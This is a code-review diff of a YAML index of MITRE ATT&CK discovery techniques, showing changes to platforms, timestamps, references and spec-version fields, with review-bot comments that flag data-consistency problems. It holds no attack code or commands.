- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1217
atomic_tests: []
T1016:
@@ -51222,7 +51915,7 @@ discovery:
x_mitre_detection: |-
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
- Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, (LinkById: T1059.008) commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
+ Monitor processes and command-line arguments for actions that could be taken to gather system and network information. Remote access tools with built-in features may interact directly with the Windows API to gather information. Further, {{LinkById|T1059.008} commands may also be used to gather system and network information with built-in features native to the network device platform. Monitor CLI activity for unexpected or unauthorized use commands being run by non-standard users from non-standard locations. Information may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
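Review bot: `{{LinkById|T1059.008}` in the new detection text has two opening braces and only one closing brace, so whatever renders these markers will leave the literal token in the output; the old form `(LinkById: T1059.008)` was at least balanced. Either close it (`{{LinkById|T1059.008}}`) or, better, resolve it to the markdown link form already used later in the same sentence, `[<technique name>](https://attack.mitre.org/techniques/T1059/008)`, since nothing else in this file uses the template syntax. While touching the line, `unexpected or unauthorized use commands being run` should read `unexpected or unauthorized use of commands being run`.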
@@ -51260,12 +51953,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1016
atomic_tests: []
T1087:
technique:
- modified: '2024-01-12T23:36:56.245Z'
+ modified: '2024-10-15T15:35:28.784Z'
name: Account Discovery
description: |-
Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
@@ -51292,14 +51984,13 @@ discovery:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
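Review bot: the T1087 platform list drops `Azure AD`, `Office 365` and `Google Workspace` in favour of `Office Suite` and `Identity Provider` (with `x_mitre_version` bumped from `2.4` to `2.5`), so any consumer that filters techniques by the old platform names will silently stop matching this technique; any per-platform index derived from this list must be regenerated in the same change, and the rename deserves an explicit line in the release notes because it changes what a "Google Workspace" or "Azure AD" view contains.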
@@ -51328,7 +52019,6 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1482:
technique:
@@ -51388,7 +52078,7 @@ discovery:
.NET methods, and LDAP.(Citation: Harmj0y Domain Trusts) The Windows utility
[Nltest](https://attack.mitre.org/software/S0359) is known to be used by adversaries
to enumerate domain trusts.(Citation: Microsoft Operation Wilysupply)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-06-16T19:18:22.305Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Domain Trust Discovery
x_mitre_detection: |
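Review bot: `- modified: '2022-11-08T14:00:00.188Z'` to `+ modified: '2022-06-16T19:18:22.305Z'` moves T1482's `modified` timestamp backwards by five months, and the same regression appears for T1217 (`2023-05-09` to `2023-04-16`), T1049 (`2022-11-08` to `2022-09-06`) and T1619 (`2022-05-11` to `2022-04-11`) elsewhere in this patch; every old value shares the `14:00:00.188Z` time component, which looks like a release-date stamp rather than a per-object edit time. This is most likely the regenerated index now carrying the upstream STIX object's own `modified` value, but the PR description should say so, since any consumer that compares `modified` to detect updated techniques will treat these entries as unchanged or older.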
@@ -51407,7 +52097,6 @@ discovery:
- 'Process: OS API Execution'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1482
atomic_tests: []
T1083:
@@ -51476,12 +52165,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1083
atomic_tests: []
T1049:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-09-06T22:35:34.231Z'
name: System Network Connections Discovery
description: "Adversaries may attempt to get a listing of network connections
to or from the compromised system they are currently accessing or from remote
@@ -51558,40 +52246,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1049
atomic_tests: []
T1497:
technique:
- x_mitre_platforms:
- - Windows
- - macOS
- - Linux
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- - Sunny Neo
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
- type: attack-pattern
- created: '2019-04-17T22:22:24.505Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497
- url: https://attack.mitre.org/techniques/T1497
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Unit 42 Pirpi July 2015
- url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
- description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
- on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
- 23, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.049Z'
name: Virtualization/Sandbox Evasion
description: |+
Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.(Citation: Deloitte Environment Awareness)
@@ -51603,6 +52262,10 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ - Sunny Neo
+ x_mitre_deprecated: false
x_mitre_detection: Virtualization, sandbox, user activity, and related discovery
techniques will likely occur in the first steps of an operation but may also
occur throughout as an adversary learns the environment. Data and events should
@@ -51613,8 +52276,14 @@ discovery:
required. Monitoring for suspicious processes being spawned that gather a
variety of system information or perform other forms of Discovery, especially
in a short period of time, may aid in detection.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - macOS
+ - Linux
x_mitre_version: '1.3'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Command: Command Execution'
- 'Process: Process Creation'
@@ -51624,9 +52293,28 @@ discovery:
- Host forensic analysis
- Signature-based detection
- Static File Analysis
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--82caa33e-d11a-433a-94ea-9b5a5fbef81d
+ created: '2019-04-17T22:22:24.505Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497
+ external_id: T1497
+ - source_name: Unit 42 Pirpi July 2015
+ description: 'Falcone, R., Wartell, R.. (2015, July 27). UPS: Observations
+ on CVE-2015-3113, Prior Zero-Days and the Pirpi Payload. Retrieved April
+ 23, 2019.'
+ url: https://unit42.paloaltonetworks.com/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1619:
technique:
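Review bot: `spec_version: '2.1'` is dropped from this object (and from every other technique touched by this patch) without a replacement; `spec_version` is a required property on STIX 2.1 objects, so any consumer that validates the exported objects against STIX 2.1 will start rejecting them. If the generator now intentionally omits it, say so in the PR description; otherwise keep the line alongside the new `x_mitre_attack_spec_version: 3.2.0`.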
@@ -51659,7 +52347,7 @@ discovery:
Adversaries may enumerate objects in cloud storage infrastructure. Adversaries may use this information during automated discovery to shape follow-on behaviors, including requesting all or specific objects from cloud storage. Similar to [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) on a local host, after identifying available storage services (i.e. [Cloud Infrastructure Discovery](https://attack.mitre.org/techniques/T1580)) adversaries may access the contents/objects stored in cloud infrastructure.
Cloud service providers offer APIs allowing users to enumerate objects stored within cloud storage. Examples include ListObjectsV2 in AWS (Citation: ListObjectsV2) and List Blobs in Azure(Citation: List Blobs) .
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-11T22:29:43.677Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Cloud Storage Object Discovery
x_mitre_detection: "System and network discovery techniques normally occur throughout
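Review bot: the `modified` timestamp for T1619 moves backwards here, from `'2022-05-11T14:00:00.188Z'` to `'2022-04-11T22:29:43.677Z'`. The same regression appears below for T1069.001, T1614.001 and T1012, and every old value in this patch shares the `14:00:00.188Z` suffix, which suggests the previous file carried release-normalised timestamps rather than the upstream object's own `modified`. Please confirm the new values are taken straight from the upstream STIX objects and note it in the PR description so the earlier dates are not read as a stale source.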
@@ -51677,12 +52365,11 @@ discovery:
- 'Cloud Storage: Cloud Storage Enumeration'
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1619
atomic_tests: []
T1654:
technique:
- modified: '2023-09-30T22:18:46.711Z'
+ modified: '2024-10-15T12:24:40.892Z'
name: Log Enumeration
description: |-
Adversaries may enumerate system and service logs to find useful data. These logs may highlight various types of valuable insights for an adversary, such as user authentication records ([Account Discovery](https://attack.mitre.org/techniques/T1087)), security or vulnerable software ([Software Discovery](https://attack.mitre.org/techniques/T1518)), or hosts within a compromised network ([Remote System Discovery](https://attack.mitre.org/techniques/T1018)).
@@ -51690,11 +52377,14 @@ discovery:
Host binaries may be leveraged to collect system logs. Examples include using `wevtutil.exe` or [PowerShell](https://attack.mitre.org/techniques/T1059/001) on Windows to access and/or export security event information.(Citation: WithSecure Lazarus-NoPineapple Threat Intel Report 2023)(Citation: Cadet Blizzard emerges as novel threat actor) In cloud environments, adversaries may leverage utilities such as the Azure VM Agent’s `CollectGuestLogs.exe` to collect security logs from cloud hosted infrastructure.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console)
Adversaries may also target centralized logging infrastructure such as SIEMs. Logs may also be bulk exported and sent to adversary-controlled infrastructure for offline analysis.
+
+ In addition to gaining a better understanding of the environment, adversaries may also monitor logs in real time to track incident response procedures. This may allow them to adjust their techniques in order to maintain persistence or evade defenses.(Citation: Permiso GUI-Vil 2023)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
x_mitre_contributors:
- Bilal Bahadır Yenici
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -51705,7 +52395,7 @@ discovery:
- macOS
- Windows
- IaaS
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'File: File Access'
- 'Command: Command Execution'
@@ -51719,6 +52409,10 @@ discovery:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1654
external_id: T1654
+ - source_name: Permiso GUI-Vil 2023
+ description: 'Ian Ahl. (2023, May 22). Unmasking GUI-Vil: Financially Motivated
+ Cloud Threat Actor. Retrieved August 30, 2024.'
+ url: https://permiso.io/blog/s/unmasking-guivil-new-cloud-threat-actor/
- source_name: SIM Swapping and Abuse of the Microsoft Azure Serial Console
description: 'Mandiant Intelligence. (2023, May 16). SIM Swapping and Abuse
of the Microsoft Azure Serial Console: Serial Is Part of a Well Balanced
@@ -51738,56 +52432,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1654
atomic_tests: []
T1087.004:
technique:
- x_mitre_platforms:
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Praetorian
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
- type: attack-pattern
- created: '2020-02-21T21:08:36.570Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1087.004
- url: https://attack.mitre.org/techniques/T1087/004
- - description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
- source_name: Microsoft msolrolemember
- - description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
- 6, 2019.
- url: https://github.com/True-Demon/raindance
- source_name: GitHub Raindance
- - description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
- url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
- source_name: Microsoft AZ CLI
- - description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
- Directory Leaks via Azure. Retrieved October 6, 2019.
- url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
- source_name: Black Hills Red Teaming MS AD Azure, 2018
- - source_name: AWS List Roles
- description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
- - source_name: AWS List Users
- url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
- description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
- - source_name: Google Cloud - IAM Servie Accounts List API
- url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
- description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
- August 4, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:51:18.808Z'
name: Cloud Account
description: "Adversaries may attempt to get a listing of cloud accounts. Cloud
accounts are those created and configured by an organization for use by users,
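Review bot: this hunk removes `Azure AD`, `Office 365` and `Google Workspace` from `x_mitre_platforms` for T1087.004, and the replacements (`SaaS`, `IaaS`, `Office Suite`, `Identity Provider`) only appear in the following hunk together with the version bump to 1.3. The same rename is applied to T1526 and T1538 further down. Anything downstream that filters or indexes techniques on the old platform strings will silently stop matching these objects, so please check the per-platform outputs are regenerated from the new names in the same change.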
@@ -51809,19 +52458,61 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Praetorian
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes, command-line arguments, and logs for actions that could be taken to gather information about cloud accounts, including the use of calls to cloud APIs that perform account discovery.
System and network discovery techniques normally occur throughout an operation as an adversary learns the environment, and also to an extent in normal network operations. Therefore discovery data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - SaaS
+ - IaaS
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8f104855-e5b7-4077-b1f5-bc3103b41abe
+ created: '2020-02-21T21:08:36.570Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1087/004
+ external_id: T1087.004
+ - source_name: AWS List Roles
+ description: Amazon. (n.d.). List Roles. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-roles.html
+ - source_name: AWS List Users
+ description: Amazon. (n.d.). List Users. Retrieved August 11, 2020.
+ url: https://docs.aws.amazon.com/cli/latest/reference/iam/list-users.html
+ - source_name: Black Hills Red Teaming MS AD Azure, 2018
+ description: Felch, M.. (2018, August 31). Red Teaming Microsoft Part 1 Active
+ Directory Leaks via Azure. Retrieved October 6, 2019.
+ url: https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/
+ - source_name: Google Cloud - IAM Servie Accounts List API
+ description: Google. (2020, June 23). gcloud iam service-accounts list. Retrieved
+ August 4, 2020.
+ url: https://cloud.google.com/sdk/gcloud/reference/iam/service-accounts/list
+ - source_name: Microsoft AZ CLI
+ description: Microsoft. (n.d.). az ad user. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest
+ - source_name: Microsoft msolrolemember
+ description: Microsoft. (n.d.). Get-MsolRoleMember. Retrieved October 6, 2019.
+ url: https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrolemember?view=azureadps-1.0
+ - source_name: GitHub Raindance
+ description: Stringer, M.. (2018, November 21). RainDance. Retrieved October
+ 6, 2019.
+ url: https://github.com/True-Demon/raindance
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1057:
technique:
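Review bot: the re-added reference keeps the misspelled `source_name: Google Cloud - IAM Servie Accounts List API` ("Servie"). Since `source_name` is the key that `(Citation: ...)` markers in the description resolve against, it should not be corrected here in isolation; either leave it to match upstream, or fix the key and the citation marker in the description in the same commit. Separately, the deprecated `x_mitre_permissions_required: - User` is dropped for this object, which is consistent with the other objects in the patch.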
@@ -51892,46 +52583,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1057
atomic_tests: []
T1497.002:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Deloitte Threat Library Team
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
- type: attack-pattern
- created: '2020-03-06T21:04:12.454Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1497.002
- url: https://attack.mitre.org/techniques/T1497/002
- - source_name: Deloitte Environment Awareness
- url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
- description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
- May 18, 2021.
- - source_name: Sans Virtual Jan 2016
- url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
- description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
- Evasion Techniques. Retrieved April 17, 2019.
- - source_name: Unit 42 Sofacy Nov 2018
- url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
- description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
- Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
- - url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
- description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
- LNK. Retrieved April 24, 2017.
- source_name: FireEye FIN7 April 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T15:50:18.050Z'
name: User Activity Based Checks
description: "Adversaries may employ various user activity checks to detect
and avoid virtualization and analysis environments. This may include changing
@@ -51955,6 +52611,9 @@ discovery:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Deloitte Threat Library Team
+ x_mitre_deprecated: false
x_mitre_detection: 'User activity-based checks will likely occur in the first
steps of an operation but may also occur throughout as an adversary learns
the environment. Data and events should not be viewed in isolation, but as
@@ -51965,9 +52624,14 @@ discovery:
processes being spawned that gather a variety of system information or perform
other forms of Discovery, especially in a short period of time, may aid in
detection. '
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Process: OS API Execution'
- 'Process: Process Creation'
@@ -51977,12 +52641,39 @@ discovery:
- Static File Analysis
- Signature-based detection
- Host forensic analysis
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--91541e7e-b969-40c6-bbd8-1b5352ec2938
+ created: '2020-03-06T21:04:12.454Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1497/002
+ external_id: T1497.002
+ - source_name: FireEye FIN7 April 2017
+ description: Carr, N., et al. (2017, April 24). FIN7 Evolution and the Phishing
+ LNK. Retrieved April 24, 2017.
+ url: https://www.fireeye.com/blog/threat-research/2017/04/fin7-phishing-lnk.html
+ - source_name: Unit 42 Sofacy Nov 2018
+ description: Falcone, R., Lee, B.. (2018, November 20). Sofacy Continues Global
+ Attacks and Wheels Out New ‘Cannon’ Trojan. Retrieved April 23, 2019.
+ url: https://unit42.paloaltonetworks.com/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/
+ - source_name: Sans Virtual Jan 2016
+ description: Keragala, D. (2016, January 16). Detecting Malware and Sandbox
+ Evasion Techniques. Retrieved April 17, 2019.
+ url: https://www.sans.org/reading-room/whitepapers/forensics/detecting-malware-sandbox-evasion-techniques-36667
+ - source_name: Deloitte Environment Awareness
+ description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+ September 13, 2024.
+ url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1069.001:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-07T17:14:42.184Z'
name: 'Permission Groups Discovery: Local Groups'
description: |-
Adversaries may attempt to find local system groups and permission settings. The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.
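Review bot: the `Deloitte Environment Awareness` reference URL changes from `https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc` to the same file id with an `/edit` suffix, and the retrieval date is moved to September 13, 2024 (the T1497 hunk above makes the identical change). Please confirm the `/edit` form resolves for a reader who is not signed in to Google Drive; if it only works for the file owner, the previous viewer-style URL is the safer one to keep.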
@@ -52025,12 +52716,11 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1069.001
atomic_tests: []
T1201:
technique:
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2024-10-15T16:02:44.477Z'
name: Password Policy Discovery
description: |-
Adversaries may attempt to access detailed information about the password policy used within an enterprise network or cloud environment. Password policies are a way to enforce complex passwords that are difficult to guess or crack through [Brute Force](https://attack.mitre.org/techniques/T1110). This information may help the adversary to create a list of common passwords and launch dictionary and/or brute force attacks which adheres to the policy (e.g. if the minimum password length should be 8, then not trying passwords such as 'pass123'; not checking for more than 3-4 passwords per account if the lockout is set to 6 as to not lock out accounts).
@@ -52041,28 +52731,31 @@ discovery:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: discovery
+ x_mitre_contributors:
+ - Regina Elwell
+ - Sudhanshu Chauhan, @Sudhanshu_C
+ - Isif Ibrahima, Mandiant
+ - Austin Clark, @c2defense
+ x_mitre_deprecated: false
x_mitre_detection: Monitor logs and processes for tools and command line arguments
that may indicate they're being used for password policy discovery. Correlate
that activity with other suspicious activity from the originating system to
reduce potential false positives from valid user or administrator activity.
Adversaries will likely attempt to find the password policy early in an operation
and the activity is likely to happen with other Discovery activity.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- Linux
- macOS
- IaaS
- Network
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
- x_mitre_domains:
- - enterprise-attack
- x_mitre_version: '1.5'
- x_mitre_contributors:
- - Regina Elwell
- - Sudhanshu Chauhan, @Sudhanshu_C
- - Isif Ibrahima, Mandiant
- - Austin Clark, @c2defense
+ - Identity Provider
+ - SaaS
+ - Office Suite
+ x_mitre_version: '1.6'
x_mitre_data_sources:
- 'User Account: User Account Metadata'
- 'Command: Command Execution'
@@ -52095,9 +52788,8 @@ discovery:
url: https://www.us-cert.gov/ncas/alerts/TA18-106A
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1201
atomic_tests: []
T1614.001:
@@ -52140,7 +52832,7 @@ discovery:
description: Ivanov, A. et al. (2018, May 7). SynAck targeted ransomware uses
the Doppelgänging technique. Retrieved May 22, 2018.
url: https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-15T22:00:56.174Z'
name: 'System Location Discovery: System Language Discovery'
description: "Adversaries may attempt to gather information about the system
language of a victim in order to infer the geographical location of that host.
@@ -52179,13 +52871,11 @@ discovery:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1614.001
atomic_tests: []
T1012:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-03T18:56:37.011Z'
name: Query Registry
description: |-
Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
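Review bot: for T1614.001 this hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0`, but unlike every other object in the patch no `x_mitre_attack_spec_version: 3.2.0` is added in their place, and the deprecated `x_mitre_permissions_required: - User` block is kept. Either the object was not refreshed from upstream or the replacement lines are missing; please check the object still carries a spec version somewhere and bring it in line with the other techniques.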
@@ -52226,87 +52916,85 @@ discovery:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1012
atomic_tests: []
T1614:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- - IaaS
